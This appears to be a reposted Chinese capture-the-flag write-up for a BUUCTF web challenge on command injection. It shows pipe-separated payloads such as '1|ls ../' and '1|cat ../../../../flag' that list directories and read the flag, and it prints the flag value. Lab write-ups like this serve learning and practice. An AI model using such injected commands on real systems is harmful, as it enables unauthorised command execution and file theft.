• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

BUUCTF : [ACTF2020 新生赛]Exec命令执行漏洞

武飞扬头像
BinaryMoon
帮助1

相关

项目 内容
难度 简单
类型 WEB
靶场 BUUCTF
坐标 Exec

学新通

观察

这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。

学新通

学新通

进攻

构造如下语句显示当前路径中的文件列表:

1|ls

返回结果:

index.php

可以看到并没有我们期望的文件 flag.php

那就去上一级目录看看,构造语句如下:

1|ls ../

返回结果:

html
localhost

注:
这些文件夹都不需要管它,在 CTF 中,flag 文件往往位于根目录下,但也不要被反套路了。

我们再前往上一级目录看看,构造语句如下:

1|ls ../../

返回结果:

cache
empty
lib
local
lock
log
mail
opt
run
spool
tmp
www

仍旧没有发现 flag.php,但没关系,让我们继续纵深探索:

1|ls ../../../

返回结果:

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

已经发现 flag 的影子了,让我们换个姿势直捣黄龙:

1|cat ../../../../flag

flag 到手:

flag{10ae5735-4ed8-438d-a682-8a302f6156d6}

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgffhfb
系列文章
更多 icon
同类精品
更多 icon
继续加载